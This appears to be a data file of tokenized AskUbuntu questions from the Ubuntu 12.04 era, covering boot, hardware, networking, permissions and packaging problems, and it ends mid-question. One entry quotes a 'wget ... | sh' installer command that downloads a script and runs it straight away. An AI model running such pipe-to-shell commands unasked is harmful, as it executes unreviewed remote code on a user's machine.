168357	why does my computer shuts down itself every morning at 6 am ?	my computer shuts down by itself at a specific time everyday 6:00am . i ca n't find what 's causing it . i 'm a long time windows user and just recently tried ubuntu . so i do n't know anything about linux commands . i remember when i was starting out with ubuntu , i tried to look for an auto-shutdown program . i 'm using qshutdown right now . it 's working ok and i 'm pretty sure my auto shutdown problem is not cause by qshutdown since i checked all of its settings . now , maybe when i was still new to ubuntu , i maybe installed some package about auto shutdown . i really ca n't remember if i did or did n't . but if i did , i do n't know where to begin looking for it . if i did n't install by accident , any other autoshutdown progam , what do you guys think may be causing the timed shutdown of my pc ? $ sudo crontab -l 4 6 * * * /sbin/poweroff # job_id_1 here 's what my syslog says : jul 26 06:04:01 ubuntu cron [ 2593 ] : ( root ) cmd ( /sbin/poweroff # job_id_1 ) jul 26 06:04:01 ubuntu kernel : kernel logging ( proc ) stopped . jul 26 06:04:01 ubuntu rsyslogd : [ origin software= '' rsyslogd '' swversion= '' 5.8.6 '' x-pid= '' 795 '' x-info= '' http : //www.rsyslog.com '' ] exiting on signal 15 .
168358	why are colors messed up on video playback ( nvidia bug ) ?	it 's been since ubuntu 11.04 that a regression appeared which causess all video playback ( which uses hardware acceleration ) to have all the colors messed up , at least on nvidia graphics cards . the issue was already widely known when i was apparently ( and surprisingly ) the first one to report it in launchpad , and not only it has n't been fixed but it has n't got the least attention : it has n't been assigned nor has it even been decided its `` importance '' ( which is not very difficult to decide ) . https : //bugs.launchpad.net/ubuntu/+source/nvidia-graphics-drivers/+bug/862831 there are workarounds for local video file playback ( applying color settings to compensate for the wrong colors ) but they must be done for every player , and not all players have this option ; plus for other things such as video streaming from web ( e.g . youtube ) there 's no workaround other than disabling video hardware acceleration , which has an unacceptable performance cost . the question is , is this being addressed or doe n't anybody give a ** that you ca n't use ubuntu for anything video-related ?
168359	how to increase swap memory ?	2 months ago , i installed ubuntu 12.04 in my pc . i never knew what was swap memory and i gave 1.5 gb for swap partition but i read in an article for a pc with 2gb ram and 100gb+ hard disk , we should allocate 2gb for swap . now i realize why pc crashes often . how can i increase my swap memory now ?
168370	are there any other im clients other than empathy and pidgin that support google talk ?	as stated above . i need something similar to google talk and it should be more stable than empathy . i dont like pidgin , for it 's interface makes it difficult to set statuses more often ... please let me have the entire list of im clients that run on ubuntu .
168372	which external sound cards are supported in 12.04 ?	rather than try to get an unspecified external sound card to work it would make sense to buy an external sound card which is known to be supported . has anyone got an external sound card which worked out of the box ?
168374	the mp3 format is not supported by the device	the banshee 2.41 rejected my mp3 sync with error : “the mp3 format is not supported by the device” my device is an iphone 3g
168379	screen does n't lock automatically	i have ubuntu 12.04 . no matter what i adjust the screen to . the screen does not lock automatically after any number of minutes . how do i remedy this ?
168380	problems installing ubuntu on a vaio with ssd , grub installation failure	i have installed and used ubuntu in several computers . but now i have a problem that i do n't know how to solve . i have a vaio ( product name : vpcz13c5e ) , it has a ssd 128gb . i decided to install ubuntu ( 12.04 , but i have tried older versions as well ) . firstly , i tested with live usb , and everything was fine , so i decided go for the complete installation . then everything went as follows : i chose to use the whole disk ( first option , formatting everything ) . i got a message executing 'grub-install ' /deb/sdb failed . this is a fatal error after clicking ok i got another window with 3 options : the first offers different devices to install the bootloader on ( i tried all of them and none works ) . second option : continue without a bootloader . in that case i got you will need to manually install a bootloader in order to start ubuntu the third option is cancel the installation . so , i chose continue without a bootloader . then i restart the computer ( with the live cd ) and in a terminal type sudo fdisk -l but i obtain fdisk : unable to seek on /dev/sda : invalid argument what can i do ? any help will be appreciated .
168383	hibernate option not available in ubuntu 12.04	my ubuntu 12.04 is missing hibernate option so after searching a little on google i came to know that this can solve my problem sudo nano /etc/polkit-1/localauthority/50-local.d/com.ubuntu.enable-hibernate.pkla fill it with this [ re-enable hibernate by default ] identity=unix-user : * action=org.freedesktop.upower.hibernate resultactive=yes here is the link : how to enable hibernation in 12.04 ? after doing this i restarted my system . when the system booted it hanged ike anything no mouse movement no terminal no nothing . i waited for more than 1 hour hibernate option appeared but i was not able to use my system anymore . any ideas ?
168398	what are the packages that are related to the empathy im client ?	as far as i know , empathy has 2 related packages empathy telepathy-gabble i want to know this so that i can update all these packages at one time to update empathy . hope that gets rid of a few bugs like connection trouble with google talk and empathy window resize bug .
168406	how do i rename files without a right-click ?	i am a new user to linux and am using ubuntu 12.04 . i would like to know if there is any way to rename files by clicking on file name and not using right click.can anybody please help me with this ?
168410	how to adjust the font size in ubuntu software center ?	i like to use the ubuntu software center , but i can not adjust the font size of the entries . so most of the entries ' fonts are so ridiculously small for me that , i ca n't read them ! i tried by changing system fonts , but that did n't help . how can i adjust the fonts of the contents in ubuntu software center in ubuntu 12.04 ?
168414	ubuntu 12.04 not booting after installation alongside windows 7	i 've tried to fix grub using boot repair . this is the ticket i got . http : //paste.ubuntu.com/1111894/ when the computer starts windows 7 is launched without any grub message . i do n't really know what else to do . any help would be really appreciated . thank you !
168417	unable to use same usb key between ubuntu and windows	i have a 16gb usb key . i 'm unable to use it properly between windows 7 and ubuntu . i formatted it as an ntfs drive in windows ( did a full format , not the 'quick ' option ) . once i write to it with ubuntu however and load it back up in windows , i get a '' this disk needs to be formatted before it can be used '' message from windows . it seems to read and write okay in ubuntu though . what 's going on ? it seems like everytime i use ubuntu to write something to it , windows can no longer read the drive . i 'm on 12.04 . i eject the drive before physically removing it .
168420	how to get ubuntu to recognize my 2nd laptop hdd on boot	in my laptop running 12.04 i have a 2nd hard disk in via an hdd caddy at /dev/sdb3 . since my main drive is a smaller ssd , this large hard drive is where i have dropbox syncing too . the problem is that my os does not see that hard disk on boot , therefore if i set dropbox to run on startup it fails with all sorts of scary errors . to get my hdd recognized , i have to open nautlilus and navigate to it . after doing this once i can start dropbox and other services that use that disk and everything runs fine . i assume that this has to do with the fact that my hard disk is in the slot the dvd drive normally is . i really would like to stop doing this dance . is there way to either configure ubuntu , or even to just script this sequence of events so i can stop doing this manually ?
168421	can i install ubuntu 32-bit and oracle 11g r2 on a 64-bit laptop ?	i have x86-64 bit laptop.can i install oracle 11g r2 on ubuntu 32bit on my laptop by installing ubuntu first , then 11g r2.please help . if anything more required , please tell me where can i find them ? thanks & regards
168422	why ca n't i change my mac address ?	here 's what i got : audrianore @ hp-mini-210-1000 : ~ $ sudo airmon-ng stop eth1 [ sudo ] password for audrianore : interface chipset driver eth1 unknown wl ( monitor mode disabled ) audrianore @ hp-mini-210-1000 : ~ $ sudo ifconfig eth1 down audrianore @ hp-mini-210-1000 : ~ $ sudo macchanger -- random eth1 permanent mac : 00:00:00:00:00:00 ( xerox corporation ) current mac : ee:68:56:21:3b:2a ( unknown ) error : ca n't change mac : interface up or not permission : too many open files in system audrianore @ hp-mini-210-1000 : ~ $ i do n't know why , the chipset is unknown , but that does n't matter ( i think ) . i was just curious with macchanger 's error . what i did today are : sudo apt-get install build-essential sudo apt-get install libssl-dev sudo apt-get install aircrack-ng sudo apt-get install macchanger hardware : 02:00.0 network controller : broadcom corporation bcm4312 802.11b/g lp-phy ( rev 01 ) i 've been googling , and i found out that this is a hardware problem ( broadcom ) . is there anything i can do with it ?
168423	wine 1.4 and office 2010 installation tutorial - ubuntu 12.04	since wine 1.4 , there is native support for office 2010 , but where is a good manual with the pre requirements ? every time when i want to install office 2010 , the setup breaks up during the installation process and it says to me , `` an error occured '' . i have no idea , how can i see those errors . any suggestions ?
168425	quickly package -- extras replaces developer email with hostname	after running quickly package -- extras for my project , i 've noticed that in project_dir/debian the changelog file has my developer email listed as alex @ myhostname , instead of my proper email address . as a result , running lintian on the generated .deb file gives an error stating it detects an invalid developer email . i 'm a little confused as to why this occurs since bzr whoami returns the correct developer name and associated email address , and i have added the developer name and email to my .bashrc entry . is there some additional configuration i have missed ? or is there something i should change in my project directory that would fix this error ?
168426	new user configuration	i want to make my dropbox directory secure from unwitting changes . so i made for my directory and files inside the following actions : chown -r dropbox : dropbox dropbox the idea is that i work under a common user , let 's name it user . and i start dropbox as dropbox user : sudo -u dropbox dropbox start but there is an error and i do n't know how to handle it : unable to access the x display , is $ display set properly ? how can i create a new user properly , in a way that achieves this goal ? currently the only configuration files in /home/dropbox directory are from /etc/skel/ directory . update to the suggestion of eliah kagan : i can not start dropbox with gksu , when i am trying to do that i get this : gksu -u dropbox dropbox start -i gksu : option requires an argument -- 'i' under dropbox user : dropbox start -i starting dropbox ... no protocol specified no protocol specified /usr/lib/python2.7/dist-packages/gtk-2.0/gtk/__init__.py:57 : gtkwarning : could not open display warnings.warn ( str ( e ) , _gtk.warning ) /usr/bin/dropbox:406 : warning : invalid ( null ) pointer instance title = `` dropbox installation '' ) /usr/bin/dropbox:406 : warning : g_signal_connect_data : assertion `g_type_check_instance ( instance ) ' failed title = `` dropbox installation '' ) /usr/bin/dropbox:414 : gtkwarning : ia__gtk_settings_get_for_screen : assertion `gdk_is_screen ( screen ) ' failed self.ok = ok = gtk.button ( stock=gtk.stock_ok ) /usr/bin/dropbox:414 : warning : g_object_get : assertion `g_is_object ( object ) ' failed self.ok = ok = gtk.button ( stock=gtk.stock_ok ) /usr/bin/dropbox:414 : warning : value `` true '' of type `gboolean ' is invalid or out of range for property `visible ' of type `gboolean' self.ok = ok = gtk.button ( stock=gtk.stock_ok ) /usr/bin/dropbox:419 : gtkwarning : ia__gtk_settings_get_for_screen : assertion `gdk_is_screen ( screen ) ' failed cancel = gtk.button ( stock=gtk.stock_cancel ) /usr/bin/dropbox:419 : warning : g_object_get : assertion `g_is_object ( object ) ' failed cancel = gtk.button ( stock=gtk.stock_cancel ) /usr/bin/dropbox:419 : warning : value `` true '' of type `gboolean ' is invalid or out of range for property `visible ' of type `gboolean' cancel = gtk.button ( stock=gtk.stock_cancel ) /usr/bin/dropbox:486 : gtkwarning : screen for gtkwindow not set ; you must always set a screen for a gtkwindow before using the window dialog.show ( ) /usr/bin/dropbox:486 : gtkwarning : ia__gdk_pango_context_get_for_screen : assertion `gdk_is_screen ( screen ) ' failed dialog.show ( ) /usr/bin/dropbox:486 : pangowarning : pango_context_set_font_description : assertion `context ! = null ' failed dialog.show ( ) /usr/bin/dropbox:486 : pangowarning : pango_context_set_base_dir : assertion `context ! = null ' failed dialog.show ( ) /usr/bin/dropbox:486 : pangowarning : pango_context_set_language : assertion `context ! = null ' failed dialog.show ( ) /usr/bin/dropbox:486 : pangowarning : pango_layout_new : assertion `context ! = null ' failed dialog.show ( ) /usr/bin/dropbox:486 : pangowarning : pango_layout_set_text : assertion `layout ! = null ' failed dialog.show ( ) /usr/bin/dropbox:486 : pangowarning : pango_layout_set_attributes : assertion `layout ! = null ' failed dialog.show ( ) /usr/bin/dropbox:486 : pangowarning : pango_layout_set_alignment : assertion `layout ! = null ' failed dialog.show ( ) /usr/bin/dropbox:486 : pangowarning : pango_layout_set_ellipsize : assertion `pango_is_layout ( layout ) ' failed dialog.show ( ) /usr/bin/dropbox:486 : pangowarning : pango_layout_set_single_paragraph_mode : assertion `pango_is_layout ( layout ) ' failed dialog.show ( ) /usr/bin/dropbox:486 : pangowarning : pango_layout_set_width : assertion `layout ! = null ' failed dialog.show ( ) /usr/bin/dropbox:486 : pangowarning : pango_layout_get_extents : assertion `layout ! = null ' failed dialog.show ( ) /usr/bin/dropbox:486 : pangowarning : pango_layout_set_wrap : assertion `pango_is_layout ( layout ) ' failed dialog.show ( ) /usr/bin/dropbox:486 : gtkwarning : ia__gdk_screen_get_default_colormap : assertion `gdk_is_screen ( screen ) ' failed dialog.show ( ) /usr/bin/dropbox:486 : gtkwarning : ia__gdk_colormap_get_visual : assertion `gdk_is_colormap ( colormap ) ' failed dialog.show ( ) /usr/bin/dropbox:486 : gtkwarning : ia__gdk_screen_get_root_window : assertion `gdk_is_screen ( screen ) ' failed dialog.show ( ) /usr/bin/dropbox:486 : gtkwarning : ia__gdk_window_new : assertion `gdk_is_window ( parent ) ' failed dialog.show ( ) segmentation fault this errors tell that something is wrong with the user graphics environment configuration .
168432	'prefix not set ' error showing , when trying to install 12.04	when i tried to install and reboot to ubuntu 12.04 , i got an error as 'prefix not set ' and if i choose the option normal mode it is showing me another error . please help me with this . i have tried to install both 32-bit and 64-bit also , but the result is same .
168436	in librecalc how do you change who the file is created by ?	ok i know this is n't exactly a linux question , but does anyone know how to change who created the file . in microsoft excel it 's prepare but there does n't seem to be an actual way to edit it that i 've been able to find and i 'm sure my instructor wo n't like the default name it is using to be acceptable for much longer no matter what the reason .
168442	how do i add a search function to gnome classic ( fallback ) panel ?	i am using ubuntu 12.04 precise with the gnome desktop environment . i like using the gnome fallback ( `` classic '' ) better than the default gnome ( i.e. , better than gnome shell ) . the only thing that i miss in gnome fallback is the search function in the panel . in gnome , when you press the super key ( windows key ) , you can immediately start typing the name of the application and then click on the desired application from the results shown to launch that app . i find that in `` classic '' gnome , it is fully menu driven ; there is no option to search for installed applications using the panel or from within the applications menu . i was wondering if this feature could be added to gnome fallback , so that instead of going by the menu , i can for example press the super key and then type the name of the application and then launch it from the results shown . i have only very limited exposure , am still figuring things out . thank you .
168446	no sound civ 5 and wine	i have installed civilization 5 retail version with an update pack called update 7 via wine and while the game runs well i am unable to get any sound working . i am running 12.04 and version 1.4 of wine via apt . any suggestions on how i could get sound working ?
168461	how do i sudo without having to enter my password ?	i 'm trying to setup sudo without no password but still i get prompted for password , i 'm using ubuntu , here is the relevant line from the sudoers configuration file : gandalf all= ( all : all ) nopasswd : all
168475	how to switch back and forth between pulseaudio+alsa and alsa only ?	i prefer using alsa only while i make screencast and do skype . other times , i use pulseaudio/alsa . is there a quick and easy way to switch between these two states on ubuntu 12.04 desktop ?
168479	ubuntu 12.04 on hp probook 4530s ?	has anyone installed correctly ubuntu 12.04 on hp probook 4530s ( radeon hd 6490 m + intel hd graphics ) ? i do n't have much time to spend in configurating the system , i would most like to simply install a system that works on my machine.i was tried this 4 months ago but i gave up because of a lot of trouble that i encountered . : (
168481	why do i get `` ca n't copy file '' error at some point after starting partitioning ?	i have the dvd version of 12.04 , which i tried to install on my lenovo machine with a core i3 processor . it 's working on live mode but when i tried to install to my hard drive it after telling it what partitions to use it fails with a `` ca n't copy file '' error . the error also had some number associated with it -- i believe it was `` error 3 '' or `` error 5 '' but i do n't remember . i also tried making a bootable pendrive but it shows same error . after this i tried the cd version of 11.10 is install and its successfully done . why ca n't i install from the dvd version ?
168485	`` the disk drive for / is not ready yet or not present '' message on boot	after upgrading my ubuntu machine from ver . 11.10 to 12.04 , i get the following error and the machine stop working before any graphical environment : ** ( plymouthd:357 ) : warning ** : command line `dbus-launch -- autolaunch=530c973a1fe4d1e1e6bd ... -- binary-syntax -- close-stderr ' exited with non-zero exit status 1 : autolaunch error : x11 initialization failed.\n udevd [ 397 ] : specified group 'colord ' unknown the disk drive for / is not ready yet or not present . continue to wait , or press s to skip mounting or m for manual recovery . any help appreciated .
168488	unable to login as another user after upgrading 10.04 lts to 12.04 lts	i have two partitions on my sony laptop , 4 gb for os and rest for /home dir ofcourse with some amount left for swap . i have upgraded ubuntu 10.04 lts to 12.04 lts in my 10.04 installation , before upgrade , the userid was `` sashank '' which was the only user in which all my files were there ( in /home/sashank ) after upgrading , the user id i gave for administrator was `` sherry '' . i could login with this id , however i added another user `` sashank '' , though if i try to login with `` sashank '' am not able to go beyond login screen . how can i login as sashank and have access to /home/sashank as before the upgrade ? any help would be greatly appreciated .
168492	a gtkentry signal emitting at focus change	i 'm writing a very simple app using glade and pygtk . in the app , i need to collect user inputs and parse it as a conf file . in order to dump all the freetext user inputs to a stringio , i am using the on_xxxxxxxx_activate signal.this solution requires the user to hit enter for the signal to be emitted . instead i would like to use a signal which emits on focus change ( switching to any other field ) . does pygtk provide a signal like that ? addendum : the behaviour i am looking for here is the one used by gtk_editable_insert_text . is there a way of linking a gtkeditable 's signal to gtkentry ?
168493	can not connect to internet in 12.04	i have a toshiba satellite l655-s5105 and have ubuntu 12.04 . i have been working with it for almost a year now and it worked perfectly . i believe i updated some packages and the next time i turned on my computer it did not allow me to connect to my wireless nor the wired connection . i tried to reinstall the driver but it did not work . please help .
168494	how can i set up multiple libraries in rhythmbox ?	i 'd like to separate my music into multiple libraries to better organize it , but anything i can find seems to be outdated . does it still require hacky solutions to do this or is it easier now ?
168502	how to get alt+sysrq work on a dell latitude e6530 ?	i have a dell latitude e6530 . the keyboard has a sysrq key ( fn+home ) . however the magic keys ( especially the famous reisub ) does n't work . sysrq is enabled in /proc/sys/kernel/sysrq ( i get 1 if i cat this file ) . it works from external usb keybord . how can i have the alt+sysrq+reisub ( in fact , alt+fn+home+reisub ) reboot my system ?
168509	how do i remove duplicate quicklist ?	ubuntu 12.04lts 64bit when i right click on the nautilus file icon in the unity bar a quicklist appears ; documents , pictures , etc . this for some reason disapeared ... i do not know why.. i guess a crash.. so i used ubuntu tweak to put them back ... however , after a reboot i now have multiple entries with no way to remove the extrra i added , they do not appear in any quicklist editor . i tried , as suggested in another similar question this : remove the old file : sudo rm /usr/share/applications/nautilus-home.desktop reinstall nautilus : sudo apt-get -- reinstall install nautilus but this did not work.. i manually removed these files , then reinstalled nautilus , but on reboot the duplicates are back . does anyone know where the config files are held ? can i manually edit ? what is strange the duplicate quicklists keep going and coming back.. thanks
168522	how can i install oracle 11g r2 ?	the title itself is more than self explanatory . i simply need a way to install oracle 's 11g r2 in the latest version of ubuntu , i 'm using a 32-bit os , and i need to know how to install the x86 version . i also have a 64 bit desktop and i need the install the x86_64 version . can anyone help me ?
168526	can not build deb package	i have followed this tutorial on how to make a .deb package from source ( tar.gz ) and at the final build command dpkg-buildpackage -rfakeroot however i get this error at the bottom : make [ 2 ] : entering directory '/home/user/packages/tympanus/tympanus-1.0.1/src' make [ 2 ] : nothing to be done for 'check ' . make [ 2 ] : leaving directory '/home/user/packages/tympanus/tympanus-1.0.1/src' making check in po make [ 2 ] : entering directory '/home/user/packages/tympanus/tympanus-1.0.1/po' intltool_extract=/usr/bin/intltool-extract srcdir= . /usr/bin/intltool-update -- gettext-package tympanus -- pot rm -f missing notexist srcdir= . /usr/bin/intltool-update -m the following files contain translations and are currently not in use . please consider adding these to the potfiles.in file , located in the po/ directory . src/tympanus.ui if some of these files are left out on purpose then please add them to potfiles.skip instead of potfiles.in . a file 'missing ' containing this list of left out files has been written in the current directory . if [ -r missing -o -r notexist ] ; then \ exit 1 ; \ fi make [ 2 ] : *** [ check ] error 1 make [ 2 ] : leaving directory '/home/user/packages/tympanus/tympanus-1.0.1/po' make [ 1 ] : *** [ check-recursive ] error 1 make [ 1 ] : leaving directory '/home/user/packages/tympanus/tympanus-1.0.1' dh_auto_test : make -j1 check returned exit code 2 make : *** [ build ] error 29 dpkg-buildpackage : error : debian/rules build gave error exit status 2 help is greatly appreciated ! i need to fix this issue as fast as possible..
168529	compiled/installed kernel 3.5 in 12.04 usb keyboard/mouse not working at boot log on screen	i installed 12.04 on an asus ep121 slate . touch acts like a left mouse click . multi-touch does n't work . i calibrated the screen and installed the latest egalax etouch driver-no joy . it booted to blank screen . i reinstalled 12.104 , then compiled and installed the latest stable kernel ( 3.5 ) , in hopes that is better supports multi-touch or at least worked better with the etouch driver . rebooted . at log on screen , usb keyboard/mouse do not function . any suggestions ?
168536	why am i getting a `` network is unreachable '' error on ubuntu server ?	i 'm a completely new to ubuntu server and am having a hard time connecting the server to the internet . i first ran ping -n 8.8.8.8 connect : network is unreachable then i ran ifconfig link encap : local loopback inet addr:127.0.0.1 mask 255.0.0.0 inet6 addr : : :1/28scope : host up loopback running mtu:16436 rx packets:192 errors:0 dropped:0 overruns:0 frame:0 tx packets:192 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:15360 ( 15.2kb ) tx bytes:15360 ( 15.3kb ) here is ouput for sudo lspci -n 00:00.0 0600 : 8086:2580 ( rev 04 ) 00:02.0 0300 : 8086:2582 ( rev 04 ) 00:1d.0 0c03 : 8086:2658 ( rev 03 ) 00:1d.1 0c03 : 8086:2659 ( rev 03 ) 00:1d.0 0c03 : 8086:265a ( rev 03 ) 00:1d.0 0c03 : 8086:265b ( rev 03 ) 00:1d.0 0c03 : 8086:265c ( rev 03 ) 00:1e.0 0604 : 8086:244e ( rev d3 ) 00:1e.0 0401 : 8086:266e ( rev 03 ) 00:1f.0 0601 : 8086:2640 ( rev 03 ) 00:1f.0 0101 : 8086:2651 ( rev 03 ) 00:1f.0 0c05 : 8086:266a ( rev 03 ) 00:0b.0 0200 : 8086:1654 ( rev 03 ) lshw-c network returns warning : you should run this program as super-user . *-network disabled description : ethernet interface product : netxtreme bcm5705_2 gigabit ethernet vender : broadcom corporation physical id : b bus info : pci @ 0000:0a:0b.0 logical name : eth0 capabilities : bus_master_cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=tg3 driverversion= 3.121 firmware=5705-v3.18 latency=32 mingnt=64 multicast=yes port=twister pair lsmod code returned this module size used by e100 37213 0 dm_crypt 23125 1 ppdev 17113 0 psmouse 87603 0 snd_intel8x0 38570 0 snd_ac97_codec 134826 1 snd_intel8x0 ac97_bus 12730 1 snd_ac97_codec snd_pcm 97188 2 snd_intel8x0 , snd_ac97_codec serio_raw 13211 0 snd_timer 29990 1 snd_pcm snd 78855 4 snd_intel8x0 , snd_ac97_codec , snd_pcm , snd_timer soundcore 15091 1 snd snd_page_alloc 18529 2 snd_intel8x0 , snd_pcm ext2 73795 1 parport_pc 32866 1 mac_hid 13253 0 lp 17799 0 parport 46562 3 ppdev , parport_pc , lp usbhid 47199 0 hid 99559 1 usbhid tg3 152032 0 i915 468651 1 floppy 70365 0 drm_kms_helper 46978 1 i915 drm 242038 2 i915 , drm_kms_helper i2c_algo_bit 13423 1 i915 video 19596 1 i915 again there is more but it 's giving info on the driver itself . i know it works , i 've used it . i assume then that my network got disabled when i installed ubuntu server . how do i enable it ? i checked and the internet cable is connected to the d-link router . i have also used this same computer for internet access when i had ubuntu desktop installed so internet does work .
168549	change mbr to gpt on external hard drive with data	change mbr to gpt on external hard drive with data : i found a way for the internal one here . however the external drive is a data drive only , i dont't need to care about any bootloaders etc . so is there an easy way to do it ? it is a 3tb external drive , the setup in gpartet looks like that : | 8mb unallocated space|1,36tb ntfs with ca 300gb of data|1,36 of unallocated space|
168556	find most recent scp files	a few weeks ago i scp 'd some files to my computer from a friend 's computer for future use . now i want to use those files , but i ca n't remember where i put them and i have looked all over . is there some sort of history of the scp 's made into my computer ? i have looked in /var/log/auth.log with no success .
168557	is there a way to disable intel speedstep on an ubuntu server using a command line application ?	we can not disable it using the bios , because turbo gets turned off as well as a side effect ( what a crappy bios ! ) . i am looking for a simple command line tool for ubuntu 12.04 lts server that can do this . i know on windows , if you set the power options to high performance , speedstep is disabled , but how can i do this on ubuntu linux using a command line application ? thanks
168558	unable to install ubuntu by usb	i have ubuntu on a live install usb flash drive . i plugged it in my computer and i made sure that my usb is selected as the first thing to load from bios . when i click boot from flash drive it loads to a black screen with a dos like appearance similar to entering safe mode in windows . it goes through a long list and stops at one point . i waited for a while to see if it would move and it does not . i have not attempted to re-download or re-burn the .iso to the flash drive , i also have not attempted using a live cd . any ideas/help ? does this question need me to require more information to be answered correctly ?
168568	ubuntu one changes 'date modified ' to time and date of sync	i 'm wondering why ubuntu one changes the date of the synced files . instead of leaving the actual date and time of modification it updates the time and date to the sync time . so , e.g. , if i change and save a file today at july 26 2 pm and i go home and sync my home-pc with u1 tomorrow at 10 the 'date modified ' of that file will reflect the syncdate which might be july 27 , 10am . i do n't like that behavior and i do n't understand if this is a bug or if that is actually intended ?
168571	reinstalling ubuntu from ubuntu	i already have ubuntu , and i was told that if i re-install the software that it would wipe the hard drive . i clicked start download and a status bar filled up and said that the download complete but nothing happened ? is this because i did not boot from an external device ? how can i reinstall ? any help ?
168574	can someone spell out what this wget command to install heroku toolbelt does ?	i 'm getting familiar with the terminal commands , and i came across this command to install the heroku toolbelt : wget -qo- https : //toolbelt.heroku.com/install.sh | sh now from here i gather that wget is used to download files from the internet through various supported protocols , and they 'll download even if i logoff . is that right ? and i wanted to know two more things about that command : i see -q0- in the code . what does it mean ? from manpages i see that -q is used to turn the output of wget off . but what does that mean too ? and how is using -q different from -q0- what is the |sh at the end of the command for ? what does that do ? thank you very much for the time !
168583	hard drive load cycle count	does the load cycle count shown below , using smart , show the total count of the hard drives lifetime ? what is the maximum count ? load_cycle_count 0x0032 081 081 000 old_age always - 39246
168586	replacing default repositories with kubuntu repositories	recently i have migrated kubuntu and kde and removed everything related to gnome ( with some exceptions of course ) . i 've read some and learnt that kubuntu has its own repositories . so , what i wonder is in what manner i have to change my repository list . i mean which part of my list should be discarded and which parts should be kept . here is my sources.list : # deb cdrom : [ ubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120425 ) ] / dists/precise/main/binary-i386/ # deb cdrom : [ ubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120425 ) ] / dists/precise/restricted/binary-i386/ # deb cdrom : [ ubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120425 ) ] / precise main restricted deb-src http : //archive.ubuntu.com/ubuntu precise main restricted # added by software-properties # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //tr.archive.ubuntu.com/ubuntu/ precise main restricted deb-src http : //tr.archive.ubuntu.com/ubuntu/ precise restricted main multiverse universe # added by software-properties # # major bug fix updates produced after the final release of the # # distribution . deb http : //tr.archive.ubuntu.com/ubuntu/ precise-updates main restricted deb-src http : //tr.archive.ubuntu.com/ubuntu/ precise-updates restricted main multiverse universe # added by software-properties # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //tr.archive.ubuntu.com/ubuntu/ precise universe deb http : //tr.archive.ubuntu.com/ubuntu/ precise-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //tr.archive.ubuntu.com/ubuntu/ precise multiverse deb http : //tr.archive.ubuntu.com/ubuntu/ precise-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //tr.archive.ubuntu.com/ubuntu/ precise-backports main restricted universe multiverse deb-src http : //tr.archive.ubuntu.com/ubuntu/ precise-backports main restricted universe multiverse # added by software-properties deb http : //security.ubuntu.com/ubuntu precise-security main restricted deb-src http : //security.ubuntu.com/ubuntu precise-security restricted main multiverse universe # added by software-properties deb http : //security.ubuntu.com/ubuntu precise-security universe deb http : //security.ubuntu.com/ubuntu precise-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . deb http : //archive.canonical.com/ubuntu precise partner # deb-src http : //archive.canonical.com/ubuntu precise partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu precise main # deb-src http : //extras.ubuntu.com/ubuntu precise main deb http : //tr.archive.ubuntu.com/ubuntu/ precise-proposed restricted main multiverse universe
168593	unable to locate package mysqld-server	i just set up a fresh install of ubuntu 12.04 on my vps , and i cant for the life of me install or even locate mysql server.. apt-cache search mysql gives no results on mysql-server/mysqld-server apt-get install mysqld-server as well as many variations just gives the output in the title : unable to locate package mysqld-server i have added the universe repo , in which it should be located , but nothing . google yields absolutely nothing on this , the only relevant info is just to run those commands , and to run another that is supposed to work : apt-get install lamp-server^ ( may be misspelled a bit , but its close and i ran the correct one earlier ) which also did n't work at all , it said the same thing , unable to locate package `` etc '' am i missing something here ? should i have a specific repository i do n't ? should i be running a different command ? or did ubuntu 12.04 drop mysql support or something ? thanks for your time guys , hope i can get this to work , its driving me crazy .
168595	setting up ssh and sftp for multiple users	i am trying to setup an sftp server and i am having issues getting it to work exactly as i like . my server has two hard drives , the first is used for the os , and it contains all of the users home directories . my second drive contains all of the data that i would like to be able to share with specific users . i want to prevent users ( except for myself ) from being able to ssh into the server , and i would like all users to be able to use sftp to transfer data to and from my `` data '' drive . limiting ssh access was easy . i created the group `` ssh_users '' , added my account to it , and added allowgroups ssh_users to the sshd_config file . getting the sftp to work as i want it to has been a struggle . i thought chrooting users to the data drive would work , but maybe i do n't have permissions setup correctly ? what can i do to get this working ? thanks
168596	if i create or modify any file or directory with sudo then i can only manipulate it with sudo	the general issue is that if i create or modify any file or directory with sudo then it seems that i 'm unable to create and modify this file or directory further as any other user than sudo . the rest of this below is me elaborating on that issue . it seems to me that i need to be sudo in order to do some things in ubuntu , for example , i ca n't seem to mount a server without being a super user , so i 'm mounting a server like this : sudo smbmount //server-address /media/netmap -o user=username , domain=domainname and i 've tried tacking on this bit about the user id and group id , but to no avail sudo smbmount //server-address /media/netmap -o user=username , domain=domainname , rw , uid=zallenlab , gid=zallenlab i am using this line from the terminal because i need to enter a password , by password for the server for one thing , not the sudo password , and i ca n't seem to get this to work by modifying the fstab file , even if i explicitly include my password in the file . and from the terminal , removing sudo , or trying just 'mount ' , neither of these things work for me , just the line that i pasted above ( both commands have the same result , tacking on that bit about uid does n't do anything ) . additionally , ive noticed something weird , that when i use the sudo command to do something like to try to create an archive of a directory , or to run rsync to do some updates , this changes the permissions of all associated dirs to being accessible to sudo only . that is really weird to me . what is the use of this type of system ? i must be doing something really wrong here . this is a problem for me because then everything i do after this point needs to be sudo in order to access files , modify them , delete , or make new files and/or folders . that is a huge pain in the ass . i run into similar issues with calling programs from scripts . it seems that sometimes if i call a program from a script it will not have read and write permissions of some files in some places . i think this is all stemming from the sudo issue . i am the only user of this machine . i think in most cases there really is one user per machine . i 'm on the 